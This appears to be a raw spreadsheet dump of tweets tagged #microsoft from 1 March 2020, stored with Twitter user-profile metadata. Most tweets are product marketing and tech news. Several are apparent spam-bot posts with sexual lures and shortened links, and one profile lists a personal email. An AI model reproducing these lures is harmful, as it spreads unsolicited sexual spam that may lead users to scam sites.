    <t>{'id': 1234221359733059585, 'id_str': '1234221359733059585', 'name': 'PkBR', 'screen_name': 'deivid_pkbr', 'location': '', 'description': 'RT all Smallstreamers... Follow!!\n\nhttps://t.co/c1inVE05lO', 'url': 'https://t.co/c1inVE05lO', 'entities': {'url': {'urls': [{'url': 'https://t.co/c1inVE05lO', 'expanded_url': 'http://twitch.tv/pkbr', 'display_url': 'twitch.tv/pkbr', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/c1inVE05lO', 'expanded_url': 'http://twitch.tv/pkbr', 'display_url': 'twitch.tv/pkbr', 'indices': [35, 58]}]}}, 'protected': False, 'followers_count': 102, 'friends_count': 248, 'listed_count': 0, 'created_at': 'Sun Mar 01 20:58:08 +0000 2020', 'favourites_count': 999, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 954, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234221527614226432/6r4JuoMo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234221527614226432/6r4JuoMo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234221359733059585/1583186059',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</si>
  <si>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21:01:09 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoftteams #microsoft     When 91 of the Fortune 100 companies all use the same collaboration platform, perhaps you should consider using it too. #MicrosoftTeams @Microsoft https://t.co/t7NfIoJEfZ</t>
  </si>
  <si>
    <t>Sun Mar 01 21:00:16 +0000 2020</t>
  </si>
  <si>
    <t>New security reports will be available to all Office 365 EOP customers.
#microsoft365 #o365 #microsoftazure #microsoft #office365 #security #msftadvocate #roadmap https://t.co/UbbkAAZtNo</t>
  </si>
  <si>
    <t>{'id': 69108016, 'id_str': '69108016', 'name': 'Carlos Garcia Junior', 'screen_name': 'cgarcia_jr', 'location': 'Brisbane, Queensland', 'description': 'SharePoint / O365 Consultant', 'url': 'https://t.co/9PGowEuH5b', 'entities': {'url': {'urls': [{'url': 'https://t.co/9PGowEuH5b', 'expanded_url': 'https://cgtech.com.au', 'display_url': 'cgtech.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 77, 'friends_count': 71, 'listed_count': 59, 'created_at': 'Wed Aug 26 21:55:59 +0000 2009', 'favourites_count': 236, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1622, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196372863193767936/RyFbwU8b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196372863193767936/RyFbwU8b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/69108016/1554683843', 'profile_link_color': 'FF6633',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</si>
  <si>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20:57:33 +0000 2020</t>
  </si>
  <si>
    <t>Is your body in my body - is it a sweet deal? #Newport Beach   #analytics #microsoft https://t.co/JHP4Xc5uYU</t>
  </si>
  <si>
    <t>{'id': 1234175075777220608, 'id_str': '1234175075777220608', 'name': 'Rebecca Porch', 'screen_name': 'quericaty', 'location': 'Minneapolis, USA', 'description': 'I will love you until the stars go out, and the tides no longer turn.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Sun Mar 01 17:54:08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'http://pbs.twimg.com/profile_images/1234182387728310279/EqOyD0ZE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234182387728310279/EqOyD0ZE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234175075777220608/1583087020',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</si>
  <si>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20:54:40 +0000 2020</t>
  </si>
  <si>
    <t>Ive decided to take on a bit of March Madness and challenge myself to learning and sharing something new on the #Microsoft Power Platform every day, for a month. Focus would be to enable new #CitizenDevelopers to get started with this amazing platform.  https://t.co/F0B1I9aF9D</t>
  </si>
  <si>
    <t>Sun Mar 01 20:54:20 +0000 2020</t>
  </si>
  <si>
    <t>As I completely adore my VCR Xbox One I think I might get an X version soon. Prices are down and this one works but all my media setup is for 4k now. Hmm.
#mods #righttorepair #modified #microsoft #xbox #xboxone #wonderlandcrew #cephalopodsquad #twitchstreamer #twitch #twitc... https://t.co/gkgLOulKzq</t>
  </si>
  <si>
    <t>{'id': 86119374, 'id_str': '86119374', 'name': 'Sypher â›„', 'screen_name': 'sypher_mach', 'location': 'Grand Rapids Mi', 'description': 'Repair Tech, Tinkerer, Audio Nerd, Twitch Affil/Mod, #modpod host, #wonderlandcrew #cephalopodsquad', 'url': 'https://t.co/5Z5iYuINQY', 'entities': {'url': {'urls': [{'url': 'https://t.co/5Z5iYuINQY', 'expanded_url': 'http://Twitch.tv/Sypher_machinations', 'display_url': 'Twitch.tv/Sypher_machinaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 235, 'friends_count': 474, 'listed_count': 15, 'created_at': 'Thu Oct 29 17:34:01 +0000 2009', 'favourites_count': 4969, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14712,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'http://pbs.twimg.com/profile_images/1158536876338364426/D4u69TkM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158536876338364426/D4u69TkM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/86119374/1577069279',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</si>
  <si>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20:43:00 +0000 2020</t>
  </si>
  <si>
    <t>What Nonprofits Need in an Accounting Software - Gravity Software https://t.co/7kCVAEhfMr by @vsilvani
#Microsoft #PowerBI #PowerPlatform #PowerApps #DynamicsCRM #Nonprofit #Organizations #FundAccounting #BecauseWeCare #Multi-Company #Accounting #Software #JustSayGo  https://t.co/Z3Kn3ytm0Z</t>
  </si>
  <si>
    <t>Sun Mar 01 20:38:19 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of #Microsoft #Windows10 Users - Forbes
https://t.co/MeW85qcw8D</t>
  </si>
  <si>
    <t>{'id': 12974522, 'id_str': '12974522', 'name': 'Michalis Michalos ðŸ‡¬ðŸ‡·', 'screen_name': 'Cyb3rMik3', 'location': 'E69342D23B1D830D', 'description': 'InfoSec, Threat Intel &amp; Analysis | @KingstonUni alumni | @ScoutsofGreece member | Husband/Father/Railfan/Wines/Explorer | My tweets = my opinions', 'url': 'https://t.co/iWWlwYq5VX', 'entities': {'url': {'urls': [{'url': 'https://t.co/iWWlwYq5VX', 'expanded_url': 'https://gr.linkedin.com/in/mmihalos', 'display_url': 'gr.linkedin.com/in/mmihalos', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1331, 'friends_count': 1676, 'listed_count': 30, 'created_at': 'Sat Feb 02 08:41:50 +0000 2008', 'favourites_count': 5119, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7145,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'http://pbs.twimg.com/profile_images/1158728858205638657/mHhX1vzA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158728858205638657/mHhX1vzA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/12974522/1475554751', 'profile_link_color': '4A913C',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</si>
  <si>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Sun Mar 01 20:37:54 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft
#amazon
Microsoft beats Amazon for $10B defense cloud contract https://t.co/11ftKDQj5T via @YouTube</t>
  </si>
  <si>
    <t>{'id': 1097077327673073664, 'id_str': '1097077327673073664', 'name': 'Felix Alan', 'screen_name': 'FelixAlan19', 'location': 'Kiambu, Kenya', 'description': 'my lifestyle and passion of unique motivation and transformational through my entrepreneurship', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 165, 'listed_count': 0, 'created_at': 'Sun Feb 17 10:16:32 +0000 2019', 'favourites_count': 2046, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1303, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1119925347535994880/cHTW5qFt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1119925347535994880/cHTW5qFt_normal.jpg',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</si>
  <si>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20:35:24 +0000 2020</t>
  </si>
  <si>
    <t>"...while not every tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognise and explore in order to achieve the same-targeted levels of power, ethics, and trust: #MSFTAdvocate https://t.co/s9uW4ohf09</t>
  </si>
  <si>
    <t>{'id': 2149675645, 'id_str': '2149675645', 'name': 'Ken Ross', 'screen_name': 'hotkrossbits', 'location': 'Atlanta, GA', 'description': 'Enterprise consultant with Microsoft and general geek-about-town. Love working with companies to understand their challenges and create innovative solutions.', 'url': 'https://t.co/PvBPIcAXY3', 'entities': {'url': {'urls': [{'url': 'https://t.co/PvBPIcAXY3', 'expanded_url': 'https://linkedin.com/in/techgeek', 'display_url': 'linkedin.com/in/techgeek', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 255, 'listed_count': 8, 'created_at': 'Tue Oct 22 20:30:22 +0000 2013', 'favourites_count': 573, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 810,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'http://pbs.twimg.com/profile_images/1095734963285110784/N-Ul_ptu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095734963285110784/N-Ul_ptu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2149675645/1550083621',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</si>
  <si>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20:35:13 +0000 2020</t>
  </si>
  <si>
    <t>1) If you dont understand why #corona has adverse effects on the global economy and wiping off stock values, well rethink it. almost all the gaint comps in the world today have a base in #China  - Your favorites; #Google #Apple #Samsung #Microsoft #Tesla n others are all there https://t.co/oVdBZCWlGu</t>
  </si>
  <si>
    <t>{'id': 212976667, 'id_str': '212976667', 'name': 'Nawaf AbdðŸ”¥ðŸ”„', 'screen_name': 'kudinawaf', 'location': 'Kumasi, Ghana', 'description': 'A Businessman; Speaker; TechPreneur; SuccessCoach; Blockchain Instructor! Founder &amp; CEO https://t.co/o5ATU2BNQo - https://t.co/2871ndY2eN - https://t.co/yM8yr1qy7D &amp; https://t.co/r2SI0VTOSr [NICS]', 'url': 'https://t.co/Jahv2VFyDe', 'entities': {'url': {'urls': [{'url': 'https://t.co/Jahv2VFyDe', 'expanded_url': 'http://www.solutionsnics.com/', 'display_url': 'solutionsnics.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/o5ATU2BNQo', 'expanded_url': 'http://eBitcoinics.com', 'display_url': 'eBitcoinics.com', 'indices': [88, 111]}, {'url': 'https://t.co/2871ndY2eN', 'expanded_url': 'http://nicsbay.net', 'display_url': 'nicsbay.net', 'indices': [114, 137]}, {'url': 'https://t.co/yM8yr1qy7D', 'expanded_url': 'http://solutionsnics.com', 'display_url': 'solutionsnics.com', 'indices': [140, 163]}, {'url': 'https://t.co/r2SI0VTOSr', 'expanded_url': 'http://nicsmedia.net', 'display_url': 'nicsmedia.net', 'indices': [166, 189]}]}}, 'protected': False, 'followers_count': 833, 'friends_count': 899, 'listed_count': 26, 'created_at': 'Sun Nov 07 16:19:01 +0000 2010', 'favourites_count': 940, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10985,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'http://pbs.twimg.com/profile_images/1212424635360387078/nj1hNEjh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212424635360387078/nj1hNEjh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/212976667/1577899535',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</si>
  <si>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20:31:09 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft     Watch this 28-second video to get a 10,000-foot view on how #MSDyn365BC connects businesses, enables smarter decisions, and helps foster growth. #MSDyn365 #Technology #IT https://t.co/4CWwCuVzJa</t>
  </si>
  <si>
    <t>Sun Mar 01 20:29:34 +0000 2020</t>
  </si>
  <si>
    <t>Dont stop touching me #Allen   #microsoft #lingerie https://t.co/Uu4Zc75Hnx</t>
  </si>
  <si>
    <t>{'id': 1234153094474272769, 'id_str': '1234153094474272769', 'name': 'Jeanne Daiker', 'screen_name': 'kidsfarmroma', 'location': 'Stamford, USA', 'description': 'Sometimes the heart sees what is invisible to the eye.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 25, 'listed_count': 0, 'created_at': 'Sun Mar 01 16:26:47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'http://pbs.twimg.com/profile_images/1234160415107579904/-EInrvTJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234160415107579904/-EInrvTJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234153094474272769/1583081778',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</si>
  <si>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20:27:55 +0000 2020</t>
  </si>
  <si>
    <t>My lesson is sponsored by #microsoft .
#onenote 
#Translator 
#sway
#flippedclassroom 
@MicrosoftEDU 
@Microsoft_Saudi https://t.co/7TpHTM0xVs</t>
  </si>
  <si>
    <t>{'id': 961995291867205632, 'id_str': '961995291867205632', 'name': 'ðŸ‡ªntisar           |        Ø§Ù†ØªØµØ§Ø± Ø§Ù„Ø¹ÙˆÙÙŠ', 'screen_name': 'mezlmas', 'location': '2ðŸ…±0R not 2ðŸ…±    KSA ', 'description': '\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200f\u200fÙ…Ø¹Ù„Ù…Ø© Ù„ØºØ© Ø§Ù†Ø¬Ù„ÙŠØ²ÙŠØ©-Ø¬Ø§Ù…Ø¹Ø© Ø§Ù„Ù…Ù„Ùƒ Ø¹Ø¨Ø¯Ø§Ù„Ø¹Ø²ÙŠØ²|Ù…Ø¹Ù„Ù… Ø®Ø¨ÙŠØ± Ù…Ø¹ØªÙ…Ø¯ Ù…Ù†â—€#Ù…Ø§ÙŠÙƒØ±ÙˆØ³ÙˆÙØª\n Microsoft Innovative Educator Expert for 2019-2020', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 247, 'friends_count': 172, 'listed_count': 0, 'created_at': 'Fri Feb 09 16:08:45 +0000 2018', 'favourites_count': 346, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 458, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1163745739845132288/Bd8V553j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1163745739845132288/Bd8V553j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/961995291867205632/1544879300',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</si>
  <si>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20:20:50 +0000 2020</t>
  </si>
  <si>
    <t>I want to quickly ride your gelding and clever horseback to the blissful heights of paradise pleasure! #Centerville   #microsoft #babe https://t.co/isELOhsmPv</t>
  </si>
  <si>
    <t>{'id': 1234202429048094720, 'id_str': '1234202429048094720', 'name': 'Jennifer Martin', 'screen_name': 'honipitu', 'location': 'Jackson, USA', 'description': 'Come live in my heart and pay no rent.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Sun Mar 01 19:42:49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'http://pbs.twimg.com/profile_images/1234209197937610756/x9WVLmvy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234209197937610756/x9WVLmvy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234202429048094720/1583093417',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</si>
  <si>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20:18:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft rolls out new system icons to all Windows 10 users https://t.co/PKVoIeqQGO #technews #technology #microsoft #productivity</t>
  </si>
  <si>
    <t>Sun Mar 01 20:17:00 +0000 2020</t>
  </si>
  <si>
    <t>With the ActiveBatch extension for #Azure, you can reduce operating expenses while improving resource utilization. Find out how:  https://t.co/fU5rTwt6Zv #partners #integration #cloud #automate #Microsoft https://t.co/960nP4smar</t>
  </si>
  <si>
    <t>Sun Mar 01 20:16:48 +0000 2020</t>
  </si>
  <si>
    <t>It would be nice to convey to you my best and make sexually #Pomona   #teamfollowback #microsoft https://t.co/lKH2Wyk0HB</t>
  </si>
  <si>
    <t>{'id': 1234189186099482624, 'id_str': '1234189186099482624', 'name': 'Brianna Fabian', 'screen_name': 'rkendemledo', 'location': 'Omaha, USA', 'description': 'He who wants to do good, knocks at the gate', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 29, 'listed_count': 0, 'created_at': 'Sun Mar 01 18:50:12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'http://pbs.twimg.com/profile_images/1234199327838437377/4YILqWgb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234199327838437377/4YILqWgb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234189186099482624/1583091126',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</si>
  <si>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20:15:49 +0000 2020</t>
  </si>
  <si>
    <t>7 Ways Franchises Can Simplify Multi-entity Accounting | Gravity Software https://t.co/2wxqoZmJlg
#AccountingNews #BusinessApps #CRMOnline #MultiEntity #CloudFinancials #Cloud #Accounting #Franchisees #Business #Software #Microsoft #CRM #MsDyn365 #CustomerEngagement</t>
  </si>
  <si>
    <t>Sun Mar 01 20:15:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts #CodeBERT ingests public #GitHub repositories to help you find code https://t.co/i2ryKEDLhC #coding #TechJunkieNews https://t.co/eXtICMoC2n</t>
  </si>
  <si>
    <t>Sun Mar 01 20:14:06 +0000 2020</t>
  </si>
  <si>
    <t>Exploring business benefits of augmenting RPA with artificial intelligence #microsoft https://t.co/THSEq0n5fv https://t.co/PhbRFQ6Sxt</t>
  </si>
  <si>
    <t>Sun Mar 01 20:10:30 +0000 2020</t>
  </si>
  <si>
    <t>Live now on halo reach! Road to 1k followers sub goal (5/20) stop on by and hang for a bit!!! #haloreach #microsoft #twitch @Rebel_GN</t>
  </si>
  <si>
    <t>{'id': 3029420164, 'id_str': '3029420164', 'name': '[RBL] MasterTemplerZ', 'screen_name': 'MasterTemplerZ', 'location': 'Virginia, USA', 'description': "Business email: Mastertemplerz@gmail.com\nDM's are always open", 'url': 'https://t.co/4wI54LdiJq', 'entities': {'url': {'urls': [{'url': 'https://t.co/4wI54LdiJq', 'expanded_url': 'http://twitch.tv/mastertemplerz', 'display_url': 'twitch.tv/mastertemplerz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 110, 'listed_count': 1, 'created_at': 'Wed Feb 11 03:22:03 +0000 2015', 'favourites_count': 385, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 786,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'http://pbs.twimg.com/profile_images/1219417448165924866/wTR9i1jt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219417448165924866/wTR9i1jt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3029420164/1570169188',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</si>
  <si>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20:05:07 +0000 2020</t>
  </si>
  <si>
    <t>#Windows7 Users: It is no longer a matter of if, but when, you will experience #cyberattacks, #data loss, and technical problems. https://t.co/igDzPbqRfF 
#windows #microsoft #cyberattack #technicaldifficulties #technicaldifficulty #techproblems #cybersecurity #IT #CEO #CIO #CTO https://t.co/QPPFPXL4vG</t>
  </si>
  <si>
    <t>{'id': 511001249, 'id_str': '511001249', 'name': 'ASiNetworks', 'screen_name': 'ASiNetworks', 'location': 'City of Industry, CA', 'description': 'Information Technology Provider', 'url': 'https://t.co/dX2MRETdKR', 'entities': {'url': {'urls': [{'url': 'https://t.co/dX2MRETdKR', 'expanded_url': 'https://asi-networks.com', 'display_url': 'asi-networks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 515, 'listed_count': 7, 'created_at': 'Thu Mar 01 23:02:48 +0000 2012', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3047,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'http://pbs.twimg.com/profile_images/1136365107112423424/2BrdYrbF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136365107112423424/2BrdYrbF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/511001249/1530143516',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</si>
  <si>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Sun Mar 01 20:03:51 +0000 2020</t>
  </si>
  <si>
    <t>I love to hold your dick in my hands and feel how it hardens.
https://t.co/aKlHlK6ADI
#Norman
 #microsoft #eco https://t.co/RKsPTIEbBp</t>
  </si>
  <si>
    <t>{'id': 1234202349566119942, 'id_str': '1234202349566119942', 'name': 'Margaret Alford', 'screen_name': 'smutaremlau', 'location': 'Arlington, USA', 'description': 'This small town hasnâ€™t got room', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Sun Mar 01 19:42:38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'http://pbs.twimg.com/profile_images/1234205834277773315/cQfDeyOt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234205834277773315/cQfDeyOt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234202349566119942/1583092626',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</si>
  <si>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20:03:46 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft @Minecraft Heres and idea.... Game Mode/ Rewind.... Or Cheat: Rewind(Shit-Alt 1) or both striggers and B, to able to rewind a certain amount of seconds to "Prevent Disaser"..... Just a thought.
#minecraft #Microsoft #gaming</t>
  </si>
  <si>
    <t>{'id': 323357666, 'id_str': '323357666', 'name': 'Sur Edward', 'screen_name': 'SurEdward3rd', 'location': 'Corpus Christi, Texas', 'description': "23, Actor,\nMusic Producer - Singer/Songwriter - Video Editor//\nhttps://t.co/6B5wRG1md4\nI'm pretty chill ðŸŽ¶ #YangGang", 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/6B5wRG1md4', 'expanded_url': 'http://soundcloud.com/EddieBX3', 'display_url': 'soundcloud.com/EddieBX3', 'indices': [63, 86]}]}}, 'protected': False, 'followers_count': 638, 'friends_count': 285, 'listed_count': 9, 'created_at': 'Fri Jun 24 17:56:48 +0000 2011', 'favourites_count': 6914, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8004,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'http://pbs.twimg.com/profile_images/1227696190470467584/BQBTw7hu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227696190470467584/BQBTw7hu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/323357666/1581540557',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</si>
  <si>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20:01:33 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #microsoftteams     IDC reported that 72% of workers will be working remotely by 2020. If you don't have the tools to support collaborative remote work, you could be making it harder for your employees to achieve their goals. https://t.co/XQRUggrJL1</t>
  </si>
  <si>
    <t>Sun Mar 01 20:00:10 +0000 2020</t>
  </si>
  <si>
    <t>How To: Setup Basic Warehousing in Dynamics 365 Business Central
https://t.co/ydSfjCqPQW
#microsoft #warehousing #howto #training</t>
  </si>
  <si>
    <t>Sun Mar 01 20:00:05 +0000 2020</t>
  </si>
  <si>
    <t>#AI is a powerful tool.  With great power comes great responsibility.  See how #Microsoft is bringing that responsibility to real life. #Responsible #Ethics #Automation https://t.co/1orFa7VhOk #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sun Mar 01 20:00:01 +0000 2020</t>
  </si>
  <si>
    <t>#MicrosoftTeams #meetings are simpler. #Teams #Microsoft #Microsoft365 #Office365 https://t.co/TzsNAjedDR</t>
  </si>
  <si>
    <t>{'id': 14089086, 'id_str': '14089086', 'name': 'Robert J Gates', 'screen_name': 'RobertJGates', 'location': 'New York', 'description': 'Business, Technology, and Creative Professional. Currently a Cloud Solution Architect at Microsoft. My focus is to help folks achieve more.', 'url': 'https://t.co/6FlqU9lz1q', 'entities': {'url': {'urls': [{'url': 'https://t.co/6FlqU9lz1q', 'expanded_url': 'http://www.robertjgates.com', 'display_url': 'robertjgates.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 457, 'friends_count': 274, 'listed_count': 16, 'created_at': 'Thu Mar 06 15:19:49 +0000 2008', 'favourites_count': 147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2197,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'http://pbs.twimg.com/profile_images/1159396658565844993/mN_CRk1c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159396658565844993/mN_CRk1c_normal.jpg',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</si>
  <si>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19:53:40 +0000 2020</t>
  </si>
  <si>
    <t>Join us in #Dubai as I speak with @ITCalls_ANabil about #Azure Sentinel and Zero Trust Architecture on the 4th March, 7 - 9 PM at Area 2071.
Link to the event: https://t.co/eQAe6fwbx5
#AzureSecurity #AzureFamily #MVPBuzz #Community #Event #Microsoft #Microsoft365 https://t.co/9ADCH63B77</t>
  </si>
  <si>
    <t>Sun Mar 01 19:51:20 +0000 2020</t>
  </si>
  <si>
    <t>I want passionate and tender love, I want to caress and love you so that my body trembles with you and you!
https://t.co/dypsMYYQsm
#Kansas
 #god #microsoft https://t.co/ZU5ZvzgNKn</t>
  </si>
  <si>
    <t>{'id': 1232097691947106304, 'id_str': '1232097691947106304', 'name': 'Laura7117', 'screen_name': 'Laura71171', 'location': 'West Valley City, USA', 'description': 'All, everything that I understand, I only understand because I love', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Tue Feb 25 00:19:20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'http://pbs.twimg.com/profile_images/1232141567605059584/gS76OSVx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232141567605059584/gS76OSVx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232097691947106304/1582600520',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</si>
  <si>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19:50:05 +0000 2020</t>
  </si>
  <si>
    <t>How to migrate SQL data to #Azure Cosmos DB
https://t.co/yWGauIQmVQ
#migration #sqldba #SQLServer #MongoDB #Amazon #DynamoDB #CosmosDB #Microsoft #madeiradata https://t.co/MidBabRTHI</t>
  </si>
  <si>
    <t>Sun Mar 01 19:49:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Linux Conference #WSLConf is SOLD OUT for General Admission
 #Microsoft #Azure #AzureFamily
https://t.co/HfdKDmqSvd</t>
  </si>
  <si>
    <t>Sun Mar 01 19:47:07 +0000 2020</t>
  </si>
  <si>
    <t>How to stay productive all day long. Checkout #Microsoft Workplace Analytics to boost #productivity https://t.co/XcN1Y4Wd9E 
#ProductivityTips  #torontobusinesses #TorontoBusinessOwners #torontobusinessowner #torontotech #torontobusiness https://t.co/dVdchqiLbI</t>
  </si>
  <si>
    <t>{'id': 122361682, 'id_str': '122361682', 'name': 'Miguel VBS', 'screen_name': 'VBSitservices', 'location': 'Toronto, Markham, ON, Canada', 'description': 'Do more with less #CRM proactive 24X7 computer support and #cybersecurity protection.', 'url': 'https://t.co/Q2CyggxakW', 'entities': {'url': {'urls': [{'url': 'https://t.co/Q2CyggxakW', 'expanded_url': 'http://www.vbsitservices.com', 'display_url': 'vbsitservices.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1102, 'friends_count': 1015, 'listed_count': 81, 'created_at': 'Fri Mar 12 12:56:44 +0000 2010', 'favourites_count': 958, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6913,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'http://pbs.twimg.com/profile_images/1104463884205744129/JSOnP1v__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1104463884205744129/JSOnP1v__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/122361682/1549278915',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</si>
  <si>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Sun Mar 01 19:45:27 +0000 2020</t>
  </si>
  <si>
    <t>Your kitty has already powdered her most intimate place and is waiting for indecent offers  #Fremont   #microsoft #dreams https://t.co/rirIKZTdsW</t>
  </si>
  <si>
    <t>{'id': 1234137070798614531, 'id_str': '1234137070798614531', 'name': 'Melanie Garcia', 'screen_name': 'glifolomin', 'location': 'Kansas City, USA', 'description': 'Where there is love there is life', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Sun Mar 01 15:23:07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'http://pbs.twimg.com/profile_images/1234157093457944576/hJ9Z1Ccc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234157093457944576/hJ9Z1Ccc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234137070798614531/1583080990',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</si>
  <si>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19:43:13 +0000 2020</t>
  </si>
  <si>
    <t>@awsaxton and @GuyInACube let's see you top THIS live stream set up. ;)
Party-spa + John Wick + Cold Beer is the best way to celebrate my #Microsoft MVP award. 
